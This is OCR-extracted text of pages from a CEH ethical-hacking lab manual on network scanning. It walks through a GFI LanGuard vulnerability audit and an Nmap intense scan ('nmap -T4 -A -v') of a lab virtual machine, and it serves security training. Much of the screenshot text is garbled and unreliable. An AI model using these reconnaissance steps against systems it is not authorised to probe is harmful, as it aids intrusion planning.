  • 31. Module 03 - Scanning Networks Lab Tasks Follow die wizard-driven installation steps to install die GFI LANguard network scanner on die host machine windows 2012 server. 1. Navigate to W indows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop FIGURE 5.1:Windows Server 2012- Desktop view 2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window Marager Windows Google bm r ♦ * Nnd V e FT‫־‬ £ SI 2)G 0 FIGURE 5.2 Windows Server2012- Apps 3. The GFI LanGuard 2012 main window appears and displays die Network Audit tab contents. B TASK 1 Scanning for Vulnerabilities Zenmap file installs the following files: ■ Nmap Core Files ■ Nmap Path ■ WinPcap 4.1.1 ■ Network Interface Import ■ Zenmap (GUI frontend) ■ Neat (Modern Netcat) ■ Ndiff / / To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 114
  • 32. Module 03 - Scanning Networks W D13CIA3 this ■‫י‬ GFI LanGuard 2012 I - | dashboard Seen R em e d y ActMty Monitor Reports Configuration UtSties Welcome to GFI LanGuard 2012 GFI LanGuard 2012 is ready to audit your network iw rtireta&dites View Dashboard Invest!gate netvuor* wjinprawiir, status and autil results Remodiate Security Issues Deploy missing patches untnsta«wwuih0rt»d30*1‫׳‬a‫״‬e. turn on ondviius and more Manage Agents Enable agents to automate ne*vroric secant? audi and to tfstribute scanning load across client macrones JP 9 % Local Com puter Vulnerability Level u s• ‫־‬Nana9# *gents‫־‬or Launch a scan‫־‬ options 10, the entile network. M< {'Mow cafh'e. — iihjIJ■: C u n en t Vulnerability Level is: High -I Launch a Scan Manually set-up andtnuser an aoerSess ne*rrxfcseajrit/ audit LATES1 NLWS tx k u l a ^ n t e d ID I -XI } u n jp W ‫־‬t>m ? !1 7(ft m» lar ‫־‬ l w mr‫»־‬ MCOort for APS81? IS. Mohr. Arrvhm !) 5 2 Pro and Standivri tr.vi • n - n u w l 10( APS812-1S. Mobm Acrobat 10.1.4 Pro mtd St— a - 0 - - M j u t V# ?*-Ajq-7017 - Patch MmuxirTimri - N n pi 1 ( 74 A q 701? Patch Mnrvtgnnnnl Added V*, 24-AJO-2012 - Patch M4 u u « m < - Add'd eaThe default scanning options which provide quick access to scanning modes are: ■ Quick scan ■ Full scan ■ Launch a custom scan ■ Set up a schedule scan FIGURE 5.3:Hie GFI LANguardmamwindow 4. Click die Launch a Scan option to perform a network scan. GFI LanGuard 2012 « t Di»e1«s thb versionOoshboerd Scan Remediate AdM ty Monitor Reports Configuration Ut*ties View Dashboard Investigate network! wjineraMit, status andauairesults Remediate Security Issues Deploy missing patches uninsia■ un8uv>o<Ue4soS«rare. turn on antivirus ana more Manage Agents Enable agents to automate noteror* secant* aud* and to tfstnbute scanning load across client machines JP 9 % Welcome to GFI LanGuard 2012 GFI LanGuard 2012 1& ready to audit your network V* *A m a b M w s Local Computer Vulnerability Level use ‫־‬van a;# Agents‫־‬or Launch a scan‫־‬ options 10 auoa the entire network. t - ^ - ‫־‬ ‫־‬ ‫־‬‫&־.יז‬ iim j M : C u n en t Vulnerability Lovel is; High Launch a Scan Manually *<rt-up andtnooer anagerttest rw‫׳‬tw j‫.»׳‬»ta in t/ audit LAI L S I NLWS < j ?4-Ajq-?01? - fa it h M<au»)«nenl - N r . pn xkjrf !^ p o rte d POF-XDum^r M e n a 2 ‫ל‬ TOb meu l a - R m i V * 2 4 A jq-2012 Patch Management Added support for APS812-16. Adobe Acrobat 9 5 2 Pro and Standard -»‫־‬«‫־‬- 24-Aju-2012 - Patch MdHdumuiri - Added suvoit lor APS812-16. Adobe Acrobat 10.1.4 Pro and Standcffd - F=ad ‫»־‬■ FIGURE 5.4:The GFI LANguard mainwindowindicatingdie Launch aCustom Scanoption 5. Launch a New scan window will appear i. 111die Scan Target option, select localhost from die drop-down list ii. 111die Profile option, select Full Scan from die drop-down list iii. 111 die Credentials option, select currently logged on user from die drop-down list 6. Click Scan. m Custom scans are recommended: ■ When performing a onetime scan with particular scanning parameters/profiles ■ When performing a scan for particular network threats and/or system information ■ To perform a target computer scan using a specific scan profile ^ If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 115
  • 33. Module 03 - Scanning Networks ‫־‬r x°‫־‬ ‫ן‬’GF! LanGuard 2012 CJ, Uiscuuttm1Dashboard Scan Ranrdijle Activ.tyMonitor Reports Conf!guraUon III41m•> l« - I ta u a d ia tn e S a n SCar‫־‬aro2t: pooac: b a t e : v M jf-J S ^n v * O t0en:‫־‬fc- ?axrrard: k»/T«rt(r ockcC on uso‫־‬ V II ‫י‬ — II Scar Qaccre... S o n ■ n d t i Ovrrvlew SOM R r u lti Orta 1l< FIGURE 5.5: Selectingan option for network scanning 7. Scanning will start; it will take some time to scan die network. See die following figure m For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database. m Quick scans have relatively short scan duration times compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week. 8. After completing die scan, die scan result will show in die left panel Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 116
  • 34. Module 03 - Scanning Networks x□ ‫־‬I‫־‬,GFI Lar>Guard2012 y I I Dashboard Scan Rcfnrdutr Actwty Monitor Reports Configuration Lttrfrtm &tauKkalnikin ScanTarget K a te: ccaftoct V ... | FalSar H j£c1'«arr: Eaasword: Cj-rr& t bcaed on iser v II Scan R r a k i Detail*Scan R n a k i ovrrvirw Scan completed! SutnmwY 8f *ear resuts 9eneraf0<1duT>51* 1>703 a u * operations processed 20<20C‫׳‬tcai‫׳‬Hgr> 1313 Crecol'-.qh) 3 V ulnerab ility le ve l: The average vulnefabilty B.e (or ttus sea‫־‬nr s 1 H jjjjtfiia fl R esu lts s ta tis tic s : Audit operations processed; LKssina software updates: Other vulneraNlthcs: Potential vulnerabilities: 4 •team target: lor.ilhost - y 10 0 0 7 |WM-D39MRSIIL9I41 (WiixJwwa . Scanner ActMty Wkxkm • ‫*ו^יז‬ CanptJar Citar VJUH>raW Jt«!a *nan? pifctv* scar fhe ! ‫ו‬4‫ז<יו‬ :ate 101 f r s q v aftwmr■wunr isatvaM or not found i----------- 12- 1 FIGURE 5.7:The GFI LanGuard Customscanwizard 9. To check die Scan Result Overview, click IP address of die machinein die right panel 10. It shows die Vulnerability A ssessm ent and Network & Software Audit: click Vulnerability A ssessm ent GFI LanGuard 2012 W, Dis c u m tvs vtssaanJ | ^ | Daihboaid Sean R a n n U ( A d M y M o rilo r Reports Configuration Ut44«s E- SCafiTaroiC: Piofe: ocafost v j . . . | |F‫״‬ IS 1‫־‬ ‫״‬ * 1 • Q ederufe: Userrvaae: ?a££0.‫׳‬rd: C j‫־‬end, bcaec on user I I J ••• 1 ___ ^ _____1 1Results Details ‫׳‬ [YVM-039MR%ML<H4| (Windows Server ?01? 164) Vulnerability level: f►•* corrvwar dues not have a Vuhe'aHty te.el •VII. * : Y/fcatdim iraan? Possible reasons: t. Tha •can b not Inched yet. 2. OsCectbn of missing patches and vuinerabif.es 8 3«at>«d *a ■ na scannira profle used to perform the scan. 3‫־‬The credentfeia used 10 3c8n this compute' <‫נג‬ nor »»:«* • * w a rty ecamer 10 refrteve 81!required hformaton tor eumatro we VutteroBlty Level An account w th s a u n r r a ,• :rs-eoei or rne target computer is requred * Certan securty srttnqs on the remote CDtrputer Dtoct r * access of Ite security scanner. Betam s a fart of msst # V a n tn r y t : lornlhost | | - 0 10 0 ‫־‬‫ר‬ V |WIW-OJ9MtOHL9L4| (Wimkms J ] j . , <1> w a H 1ty W ^ n rr n t | ‫־‬• n Net-war* & Softwire Audit Scaruicr A ctM ty Window flt e e t lK M Q L H1rv*d I (kill•) U ..‫״‬ M •' ■<v> I Ic— t f i i s l d r i I ftw w l FIGURE 5.8: SelectingVulnerabilityAssessment option Types of scans:m Scan a single computer: Select this option to scan a local host or one specific computer. Scan a range of computers: Select this option to scan a number of computers defined through an IP range. Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list. Scan computers in test file: Select this option to scan targets enumerated in a specific text file. Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 117
  • 35. Module 03 - Scanning Networks 11. It shows all the Vulnerability A ssessm en t indicators by category V GFI LanGuard 2012 -‫־‬Tbl‫־‬ x ‫־‬ L d > «‫־‬ Dashboard Sun R&neddte Activity Men!tot Reports Configuration JUbties W, D18CUB8•as v«a«on._ laaodi a Merc Scan Bar Target; »roS»: ‫י‬ ‫׳‬ | j ... MScar- 3 $ c/fomess Jgynang: Password: [curfrSr twftfonutier V1 5o r A StanRevifttOeUNa Vulnerability Assessment 5«tea ene of the 4U01Mrx)wjfcerabilry ‫יי‬3‫»*ל‬ *qn security Vumerabtmes (3) X b u you to analyze the 1 ‫־‬0‫״‬ secuirty v jr e t b i: a ^ ■Jedium Security VulneraMKies (6) ilo«.sycutoanaJy7e th s rr« lu n 1ec1rityvurerai>i5es (14Low Security Vulnerabilities. 15iy » thelc« 9ecuIty‫׳‬yeu to a^ (1)Potential vulnerabilities. o‫־־‬Xb>.s y«u to a-elvre tiie informationsecurity aJ ttit-fung Stiivfca Packs and Updalo Rollups (1) U>»3ycutoane(yK thcrmeiroiervmpKtsnVmevn Scan lUnutti Overvttm ^ $ u a U r« « t:lQ u lm l f S I S ItM J ( m R - K M M U H U M ](W M to m . - • «uhefeblty Astastrocnt A ‫*־י‬ * securitywirerablofa(3) Jl MeCtomScanty Vuherabirtes (6) j , low Searity Viinerablitfes(4J 4 PofanBd Vuherabltea (3) t Meshc servicePacksand Usdate=&u>s (1} # Msarvs Security Lfxlates (3) - _* Hec*alt&S0ftAareA1rft thread I (Idle) |Scan Pvead 7 (d t' I 5 u n t1 « : 3 Otfic] Bras / 7 During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities including: ■ Missing Microsoft updates ■ System software information, including unauthori2ed applications, incorrect antivirus settings and outdated signatures ■ System hardware information, including connected modems and USB devices FIGURE 5.9:List ofVulnerabilityAssessmentcategories 12. Click Network & Software Audit in die right panel, and dien click System Patching Status, which shows all die system patching statuses t o ■ >• 4 - 1 C ri LinOuard 2012 1‫״‬r‫״‬-1 Dmhboard Sran Re‫*»״‬Aate Activity Monitor Rrpoiti Configuration JMairt <U) ' lliir in it n v n w m tau ad ts New Scan Scar ’ •o e ‫־‬- Hoft*. - ‫״‬ ‫״‬ ‫״‬h '‫־״‬1 1- *|« & Oafattab: Js en re ; Pais/.ord: |0 rren#» ogc« or uer 1‫־‬ Sari 1Remits Detais System Patching Status Selectone of tte M ta h g system w tchro M U M inting Servlet‘ Pack* ■•nit Update RoSupa (1) AlsmyeutaaiYilyiethrrnaingap'verpttlMnfarmaw Mk Missing Security Updates (,J) Alowt Mu U nWy.'t U1« mlBtfiOMcvltv updatat »1fo‫׳‬Tnalor m Missing Non-Security Updates (16) Alan* you to analyie the rwn-securityipaatea rfamssen J% staled Security Updates (2) JUave you ‫ט‬ an4>2s tJlcilitaifed security U>Ca‘x hftmala■ J%instated Non-Security Updates (1) Alo5‫״י‬ you to analyze the nstalicd nor-setuity Scan Resafe Overview - 9 Scan ta rv e t iocalhost - 3 1 8 I M A / [W » 0 3 9 N R S W « 4 ] ( I M l t K - m 5 4 M iiaebitv t o n T e il A ‫,־‬ C*' SecultY ViiieraMitte( (3) X rv*4un securityvUrcrabilBe• (6) X taw SecurityVJ*»ablt11s (4) X c‫״‬or»«nal vunrrahltif# (‫)ג‬ t *toarq Service Pata wv4 itodateRaJl«M {I) f > W < 1Saq1 UyUD0«Ufctt) I ‫״‬ ftoary-a^V flfc nufltI S % Ports U A rtor&Atrc *)- fi Software a system inlbnnaaon Scanner Actmty VVaitkm X Starting security scan of hoar WII1-I139MMSMI 9t 4[1c0.0 /] g lane: IM It U PM : 1 .v 'ry Scan thread 1 (idle) S c itr a a : I( d * : *m ~‫־‬.! t» . 3 :rrgr* FIGURE 5.10: Systempatchingstatusreport 13. Click Ports, and under diis, click Open TCP Ports Due to the large amount of information retneved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 118
  • 36. Module 03 - Scanning Networks 1 - 1 ■ ■GFl LanGuard2012 CJ, U is c u u tins 1Scan Rarmfcale £*!1v ty Monitor Reports Corrfigura•> l«- I& jbcahoK V I ... I |M S w 1 ‫י‬ ‫י‬ ‫ו‬ • Qc0en‫־‬.dfe. Uenvaae: SasGword: |0xt«rtK ocKcC on us®‫־‬ - II 1__* = _____ 1 • ft) soiDf*crpno‫״‬: Mytxrtrrt Trerwftr Protocol {^‫ליודז‬ >sr-w r: http (kt/0er re»t Tfonjfcr PttitoroO] ^ 9 5‫כג‬ (C w ucto- DCC w»i1u‫״‬ l ‫׳‬«sOl)0«‫־‬ £ 1f) ►**CTt*0‫׳‬V NMKOS 5M »1‫׳‬ S*fM» I SOTOt r « » ‫״‬n] ^ *4J Pfiapton: MooioftOS k t t * O m lav, VMntfcwtV a n fim itw : Lrtnamn] B £ 10J7 piMotooon: !r#t»1fo, 1( tM&*ervce h not t1‫»׳‬Urt(d :*•>*« caJO &• Croj^r: eiandwtjne, Oaufipy *rd others / Sev»c s ^ t-.H |Deunpecn: LSASS, If tha » m « is not ratafc* be-*ae catfc ;<■trsjan: CtotafipyNetwork x, Oatham3 etners / Ser - 9 ::-2 |C«sobacn: MeProtect. MSrtQ, t" te 1v. M>)elc ‫י‬‫»-־‬ - » a)c ro( r •-U wJ D*m«r* COuUttt uojan: BLA trojan . Se 4‫׳‬ « £ 1241 |t« c r o o c : Ne35u5 Jcarity Scanner /Server: 1r*no«nJ 9 ^ 1433 (O sac& cn: Microsoft SQL Server database r a ‫־‬a j r w : srtscn Ser .er j S a -kx; Ofcnown] 9 v ‫־‬a«1 tn rprT-.lornlho*r ‫־‬• R : ; 10.0.0.7 |WIN-039MR5IIL9t4| (W m dvn _ - • viAwjBMy**owtwfnt J l ‫)*־‬h Sacuity ‫״<«וי‬rfiltr* (1) ^ Mtdum Scanty MinerdMIUet (6} X Law Seeunty VUnerabttiei (4} ^ PoewtOii VOwaMitfeC (3) # MoangService Pocks ondtp4?te R0I 1O9 CO # MsangSecuity Updates (3) B *•ernoHc 81Software Audit *. ( ( System Patchrg Status 333]‫־‬ P torts {Sj I‫׳>־‬1‫״‬I . floe (5)•w Coen LC» Ports 1A Hardware .i f Software 11System [nfbmodon wooer ActKRy Wtaiduw •vl ! :<*>) error■‫.׳*־‬‫־‬5 0|(Ip)/‫י‬wrfad‫״‬y v a n thread 1(tdlr) Sea* ‫׳‬1pr..«t4scev‫־‬ FIGURE 5.11: TCP/UDP Ports result 14. Click System Information in die light side panel; it shows all die details of die system information m A custom scan is a network audit based on parameters, which you configure on the fly before launching the scanning process. Vanous parameters can be customized during this type of scan, including: ■ Type of scanning profile (Le., the type of checks to execute/type of data to retrieve) ■ Scan targets ■ Logon credentials 15. Click Password Policy r‫־‬‫־‬° n nGH LanGuard 2012 E B > 1 4 - 1 Dathboatd Scan Ravrwifcalr ActHity Monitor Reports Configuration UaUwt W. 1)1*1 lew •«« m u ii tauach a Mewscan ScarTargtc P0.‫־‬«t : a i h x : v |... I (‫׳‬SjIScan 3 • &ederate: L&c‫״‬ iaBL ?aaiwd: Z~M~CTt, bcced on toe‫־‬ V 1 U 1J 1__ S a r Co'janu... Scan R etakt Ovnvmn Scan I r a k i Deta lie J *‫!־*׳‬run poaawd length: 0char- J Vaxnuri EMSSiwrd age: 42days J **‫״!־‬unoaa'wordsgeiodays J ! Peace « p ff reiw force J >Mgw0rd mtary: nohttay % open IXP Ports (5) Sf A ‫־‬ta‫־‬d/.«e *‫׳‬ I50fr»gne___ | Systsn Infotmabotj a9ki‫.׳‬W ,|lHW.fxC.!■■>>•>1 • S*.ul(. Audit Policy (Off) Wf Re0**v f t Net&JOS Mamas(3) % Computet tj| 610Lpt (28) & Users (4) LoggedCn Users (11) ^ Sesscre (2) % J<rvce5 (148) ■U Processes (76) , Remote TOO (Tme OfOay) Scanner Activity Window ■t- ‫׳‬ ‫״‬ I 1 , V 1‫״‬n thrv*d I (kllr) S can th eflU C *) i f< * 41‫־‬ !'‫׳‬' ’A ) I ‫י‬‫י‬ ‫׳‬"' FIGURE 5.12 Information ofPassword Pohcy 16. Click Groups: it shows all die groups present in die system L_/ The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 119
  • 37. Module 03 - Scanning Networks ‫ר‬‫׳‬ -T o -GFI L an G u a rd 2012 !)19CUB3 Ultt VWttKJR—Dashboard S u n ftftnca& e Actmrty Monitor Reports Configuration>‫־‬* v l W **S can H CrM e re st -igemane: Password: [cuT€r*f eooed cn user H ■cc':era S c*• RevuJU D eU ik Control AucUat* Cws abx1 * P n t t a w i 0*Ji.sOuvrctgrv cmfcwaw# dccmwcm O (V'teyjM ‫>׳‬-t w i t s '! CfctrtutedCCMUser* & *n t Log Straefcrs Guests K>pe‫׳‬ VAdrritstrators E5JUSRS r^tv>:‫׳‬<Ccnfig.rstcn Cp‫־‬rators Psrfertrsnce Log Users Pr‫־‬fty1r 5rcc ' r ~a users P M v lS e rs **?Operators RES Ehdpcut Servers PCSManage‫»״‬entServers * ft ■ ft • ft • ft * ft ■ ft ‫י‬ ft • ft *ft ‫יי‬ ft * ft ‫־״‬ft • ft ♦ a » a • ft ‫ז‬ a 1 R tfvnlti Overview % C0«nUOPPwts(5) r A Menfciore • .1 Softo•'( • ^ Symrmtnknranon « S h » » (6) •4• Pd«wo1‫׳‬ ) Pdiy - i» Sxunty AudtPotcy (Off) # ‫־‬ lUotetry f t NetflCCSNarres (3) % Computer l*i groups(2a)I I W4} •?. -OXfC 0 ‫״‬ users ( 1 ‫)נ‬ % S«ss»ns (2) % Servfcee (l•*©) Hi ®rocrase* (76) ‫ג‬ en»te to o ‫חן‬‫מיו‬ Of0»y) W w r t * ‫״‬ - . S*rf« 1l1f 1 .nl 1 (tdl•‫)׳‬ | Scan tfve*0 ? frt*) Soan *read S*fe ) | 8 ‫׳‬0‫י‬ • | FIGURE 5.13: Information of Groups 17. Click die Dashboard tab: it shows all the scanned network information 1 ° n ^ ‫׳‬GFI LanGuard 2012 I Dashbcurdl Sun Remedy!* Activity Monitor Reports Configuration UUkbe; ‫־./זי‬ O ucuM lna varam.. !t f# V»' t o 4 V fei v ( 1 * t *JCem ctm •w «v ViAirrnhlfces PeA* SdNiare > 4- 5‫״‬ I qCrap Entire Network -1 computer SecurityS«1tors w nw arn iw u w • 1 ___ HT«W9MIM^g o 0 cc<rpute5‫־‬ ^ ‫ז‬ C S ^ lK I 0 cancuters Service Packs and U- Lratra-onied Aco*c Malware Protection ... ‫כ‬ O Occrrputers Cco‫־‬pu‫־‬c rj ‫ו‬ computers Vulnerabilities _ A u lt Sure* : _ Agent Hemm Issues I o •1CO‫״‬p0t«r9 « ‫ד‬ ‫י‬‫״‬ ‫י‬» !0 ; 0 C0npu18C8 r S Most M rarane cawoJSfS V. SC3y ‫׳‬ ^ L 364 ,A iirraN ity Trend Owe' tm e fu tM ByGperatng Syftem‫־‬o: 1v,vo>5Se‫«׳‬ oComputes S■O0€>ath. ■.| Conpjters By rtet» o rt.. I Computer V14>erabfeyCBtnbLiivi w 1*aer*Stofcg|>3tStafcg| it6mel1n*ork f j UKJ»-c«t: ttlh-03»Ma.5rt.4£-» ‫־‬ '^ucj1!)<»w>:y10«j<1iR<x1> Maraqe saerts ■HLsr-.‘.Krxfl*n... Sc-=radrsfrar.tfggnaMnp.raZjstarcan... Sec :wdg-.as.‫״‬ C^pm:-jr_ FIGURE 5.14: scanned report of the network Lab Analysis Dociunent all die results, dueats, and vulnerabilities discovered during die scanning and auditing process. m A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high. A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically. m It is recommended to use scheduled scans: ■ To perform periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters • To tngger scans automatically after office hours and to generate alerts and auto- distribution of scan results via email ■ To automatically trigger auto-remediation options, (e.g., Auto download and deploy missing updates) Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 120
  • 38. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved Vulnerability Level Vulnerable Assessment System Patching Status Scan Results Details for Open TCP Ports GFI LanG uard 2012 Scan Results Details for Password Policy D ashboard - Entire N etw ork ■ Vulnerability Level ■ Security Sensors ■ Most Vulnerable Computers ■ Agent Status ■ Vulnerability Trend Over Time ■ Computer Vulnerability Distribution ■ Computers by Operating System P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze how GFI LANgtiard products provide protection against a worm. 2. Evaluate under what circumstances GFI LAXguard displays a dialog during patch deployment. 3. Can you change die message displayed when GFI LANguard is performing administrative tasks? If ves, how? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 121
  • 39. Module 03 - Scanning Networks Exploring and Auditing a Network Using Nmap N/nap (Zenmap is the officialA',map GUI) is afree, opensource (license) utilityfor netirork exploration andsecurityauditing. Lab Scenario 111 die previous lab you learned to use GFI LanGuard 2012 to scan a network to find out die vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. A11 administrator and an attacker can use die same tools to fix or exploit a system. If an attacker gets to know all die information about vulnerable computers, diey will immediately act to compromise diose systems using reconnaissance techniques. Therefore, as an administrator it is very important for you to patch diose systems after you have determined all die vulnerabilities in a network, before the attacker audits die network to gain vulnerable information. Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in diis lab to use Nmap to explore and audit a network. Lab O bjectives Hie objective of diis lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime. hi diis lab, you need to: ■ Scan TCP and UDP ports ■ Analyze host details and dieir topology ■ Determine the types of packet filters ICON KEY Valuable information Test vour knowledge S W eb exercise ‫ט‬ W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 122
  • 40. Module 03 - Scanning Networks ■ Record and save all scan reports ■ Compare saved results for suspicious ports Lab Environm ent To perform die lab, you need: ■ Nmap located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsNmap ■ You can also download the latest version of Nmap from the link http: / / nmap.org. / ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 as a host machine ■ Windows Server 2008 running on a virtual machine as a guest ■ A web browser widi Internet access ■ Administrative privileges to run die Nmap tool Lab Duration Time: 20 Minutes O verview of N etw ork Scanning Network addresses are scanned to determine: ■ What services application names and versions diose hosts offer ■ What operating systems (and OS versions) diey run ■ The type of packet filters/firewalls that are in use and dozens of odier characteristics /— j Tools demonstrated in thislabare available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks . Q Zenmap works on Windows after including Windows 7, and Server 2003/2008. Lab Tasks Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner in die host machine (Window Server 2012). 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop TASK 1 Intense Scan FIGURE 6.1:Windows Server 2012—Desktop view Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 123
  • 41. 2. Click the Nmap-Zenmap GUI app to open the Zenmap window Module 03 - Scanning Networks S t 3 f t Administrator Server Manager Windows PowrShell Google Manager Nmap - Zenmap Sfe m * ‫י‬‫ו‬ Control Panel H y p *V Virtual Machine.. o w e Command Prompt * ‫ח‬ Frtfo* © Me^sPing HTTPort iS W M CWto* K U 1 l__ Zenmap file installs the following files: ■ Nmap Core Files ■ Nmap Path ■ WinPcap 4.1.1 ■ Network Interface Import ■ Zenmap (GUI frontend) ■ Neat (Modem Netcat) ■ Ndiff FIGURE 6.2 Windows Server 2012- Apps 3. The Nmap - Zenmap GUI window appears. ! Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification} FIGURE 6.3:The Zenmap mainwindow / In port scan techniques, only one 4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) method may be used at a t!1e j arget: text field. You are performing a network inventory for time, except that UDP scan r o J (‫־‬sU) and any one of the th e v irtu a l I11acllil1e. SCI1P scan types (‫־‬sY, -sZ) 111this lab, die IP address would be 10.0.0.4; it will be different from your lab environment 111the Profile: text field, select, from the drop-down list, the type of profile you want to scan. 111diis lab, select Intense Scan. may be combined with any 5 . one of the TCP scan types. 6. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 124
  • 42. Module 03 - Scanning Networks 7. Click Scan to start scantling the virtual machine. - ‫׳‬‫׳‬ ° r xZenmap Profile: Intense scan Scan Iools Profile Help Target: 110.0.0.4| Command: nmap -T4 -A -v 10.0.0.4 Ports f Hosts | Topology | Host Details | ScansNmap Outputicc> |Host! Services OS < Host FIGURE 6.4: The Zenmap mainwindowwithTarget and Profileentered Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab. ^ ‫ם‬ ‫ז‬‫י‬ X ‫ן‬ 8. Zenmap 10.0.0.4 ‫׳י‬ Profile: Intense scan Scan: Scan Io o ls Erofile Help Target: Command: nmap -T4 -A -v 10.C.0.4 Nn ■apOutput [ports / Hosts | Topolog) | Host Details | Scans nmap-T4 •A-v 10.00.4 ^ | | Details S t o r t i n g Nmap C .O l ( h t t p : / / n m s p . o r g ) a t 2012 0 8 24 NSE: Loaded 93 s c r ip t s f o r s c a n n in g . MSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 5 :3 5 S ca n n in g 1 0 .0 .0 .4 [1 p o r t] C o m pleted ARP P in e Scan a t 1 5 :3 5 , 0 .1 7 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DNS r e s o lu tio n o f 1 h o s t, a t 1 5 :3 5 C o m pleted P a r a lle l DNS r e s o lu t io n o f 1 h o s t, a t 1 5 :3 5 , 0 .5 0 s e la p s e d I n i t i a t i n g SYN S te a lth Scan a t 1 5 :3 5 S ca n n in g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] D is c o v e re d open p o r t 135!‫׳‬ tc p on 1 6 .0 .0 .4 D is c o v e re d open p o r t 1 3 9 /tc p on 1 0 .0 .0 .4 D is c o v e re d open p o r t 4451‫׳‬ tc p on 1 6 .0 .0 .4 In c r e a s in g send d e la y f o r 1 6 .0 .0 .4 f r o « 0 to ‫צ‬ dee t o 72 o u t o f 179 d ro pp ed p ro be s s in c e la s t in c re a s e . D is c o v e re d open p o r t 4 9 1 5 2 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 4 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 3 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 6 /tc p on 1 0 .0 .6 .4 D is c o v e re d open p o r t 4 9 1 5 5 /tc p on 1 0 .0 .0 .4 D is c o v e re d open p o r t 5 3 5 7 /tc p on 1 0 .6 .0 .4 OS < Host 10.0.0.4‫׳‬ ‫׳‬ Filter Hosts FIGURE 6.5:The Zenmap mainwindowwiththeNmap Outputtab forIntense Scan 9. After the scan is complete, Nmap shows die scanned results. While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them. ! S "The six port states recognized byNmap: ■ Open ■ Closed ■ Filtered ■ Unfiltered ■ Open |Filtered ■ Closed|Unfiltered Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 125
